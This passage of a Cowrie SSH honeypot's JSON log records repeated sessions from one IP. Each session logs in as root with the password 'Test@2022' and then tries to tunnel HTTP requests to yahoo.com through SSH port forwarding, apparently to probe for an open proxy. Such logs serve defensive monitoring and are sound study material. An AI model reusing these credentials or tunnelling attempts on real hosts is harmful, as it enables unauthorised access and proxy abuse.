57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:15.995052Z","src_ip":"213.209.150.239","session":"82a2a5241dbf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:16.277329Z","src_ip":"213.209.150.239","session":"82a2a5241dbf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":10932,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:10932","sensor":"my-vps","timestamp":"2025-08-26T01:06:16.334859Z","session":"82a2a5241dbf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:16.391532Z","src_ip":"213.209.150.239","session":"82a2a5241dbf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":29714,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:29714","sensor":"my-vps","timestamp":"2025-08-26T01:06:16.547101Z","session":"82a2a5241dbf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:16.603850Z","src_ip":"213.209.150.239","session":"82a2a5241dbf"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:16.661491Z","src_ip":"213.209.150.239","session":"82a2a5241dbf"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":40806,"dst_ip":"1.2.3.4","dst_port":22,"session":"0505e4a09b8d","protocol":"ssh","message":"New connection: 213.209.150.239:40806 (1.2.3.4:22) [session: 0505e4a09b8d]","sensor":"my-vps","timestamp":"2025-08-26T01:06:16.716825Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:16.718090Z","src_ip":"213.209.150.239","session":"0505e4a09b8d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:16.774480Z","src_ip":"213.209.150.239","session":"0505e4a09b8d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:17.056334Z","src_ip":"213.209.150.239","session":"0505e4a09b8d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":16922,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:16922","sensor":"my-vps","timestamp":"2025-08-26T01:06:17.113737Z","session":"0505e4a09b8d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:17.170322Z","src_ip":"213.209.150.239","session":"0505e4a09b8d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":13481,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:13481","sensor":"my-vps","timestamp":"2025-08-26T01:06:17.326879Z","session":"0505e4a09b8d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:17.383395Z","src_ip":"213.209.150.239","session":"0505e4a09b8d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:17.440715Z","src_ip":"213.209.150.239","session":"0505e4a09b8d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":40883,"dst_ip":"1.2.3.4","dst_port":22,"session":"a267b62d9068","protocol":"ssh","message":"New connection: 213.209.150.239:40883 (1.2.3.4:22) [session: a267b62d9068]","sensor":"my-vps","timestamp":"2025-08-26T01:06:17.486839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:17.487708Z","src_ip":"213.209.150.239","session":"a267b62d9068"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:17.534616Z","src_ip":"213.209.150.239","session":"a267b62d9068"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:17.768443Z","src_ip":"213.209.150.239","session":"a267b62d9068"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":8796,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:8796","sensor":"my-vps","timestamp":"2025-08-26T01:06:17.816340Z","session":"a267b62d9068"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:17.863393Z","src_ip":"213.209.150.239","session":"a267b62d9068"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":11869,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:11869","sensor":"my-vps","timestamp":"2025-08-26T01:06:17.997276Z","session":"a267b62d9068"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:18.044247Z","src_ip":"213.209.150.239","session":"a267b62d9068"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:18.092142Z","src_ip":"213.209.150.239","session":"a267b62d9068"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":41021,"dst_ip":"1.2.3.4","dst_port":22,"session":"127e619d839f","protocol":"ssh","message":"New connection: 213.209.150.239:41021 (1.2.3.4:22) [session: 127e619d839f]","sensor":"my-vps","timestamp":"2025-08-26T01:06:18.147820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:18.148534Z","src_ip":"213.209.150.239","session":"127e619d839f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:18.205264Z","src_ip":"213.209.150.239","session":"127e619d839f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:18.487226Z","src_ip":"213.209.150.239","session":"127e619d839f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":2392,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:2392","sensor":"my-vps","timestamp":"2025-08-26T01:06:18.545868Z","session":"127e619d839f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:18.602777Z","src_ip":"213.209.150.239","session":"127e619d839f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":7979,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:7979","sensor":"my-vps","timestamp":"2025-08-26T01:06:18.759269Z","session":"127e619d839f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:18.816015Z","src_ip":"213.209.150.239","session":"127e619d839f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:18.873406Z","src_ip":"213.209.150.239","session":"127e619d839f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":41078,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fd8e34c0788","protocol":"ssh","message":"New connection: 213.209.150.239:41078 (1.2.3.4:22) [session: 5fd8e34c0788]","sensor":"my-vps","timestamp":"2025-08-26T01:06:18.919511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:18.920265Z","src_ip":"213.209.150.239","session":"5fd8e34c0788"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:18.967541Z","src_ip":"213.209.150.239","session":"5fd8e34c0788"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:19.202579Z","src_ip":"213.209.150.239","session":"5fd8e34c0788"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":16150,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:16150","sensor":"my-vps","timestamp":"2025-08-26T01:06:19.250796Z","session":"5fd8e34c0788"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:19.297990Z","src_ip":"213.209.150.239","session":"5fd8e34c0788"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":31354,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:31354","sensor":"my-vps","timestamp":"2025-08-26T01:06:19.433590Z","session":"5fd8e34c0788"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:19.480804Z","src_ip":"213.209.150.239","session":"5fd8e34c0788"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:19.528910Z","src_ip":"213.209.150.239","session":"5fd8e34c0788"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":41112,"dst_ip":"1.2.3.4","dst_port":22,"session":"0560b529dfef","protocol":"ssh","message":"New connection: 213.209.150.239:41112 (1.2.3.4:22) [session: 0560b529dfef]","sensor":"my-vps","timestamp":"2025-08-26T01:06:19.584542Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:19.585778Z","src_ip":"213.209.150.239","session":"0560b529dfef"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:19.642134Z","src_ip":"213.209.150.239","session":"0560b529dfef"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:19.924520Z","src_ip":"213.209.150.239","session":"0560b529dfef"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":5724,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:5724","sensor":"my-vps","timestamp":"2025-08-26T01:06:19.982163Z","session":"0560b529dfef"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:20.038903Z","src_ip":"213.209.150.239","session":"0560b529dfef"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":3664,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:3664","sensor":"my-vps","timestamp":"2025-08-26T01:06:20.195293Z","session":"0560b529dfef"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:20.251834Z","src_ip":"213.209.150.239","session":"0560b529dfef"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:20.309759Z","src_ip":"213.209.150.239","session":"0560b529dfef"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":41173,"dst_ip":"1.2.3.4","dst_port":22,"session":"024a5aa7252c","protocol":"ssh","message":"New connection: 213.209.150.239:41173 (1.2.3.4:22) [session: 024a5aa7252c]","sensor":"my-vps","timestamp":"2025-08-26T01:06:20.365600Z"}
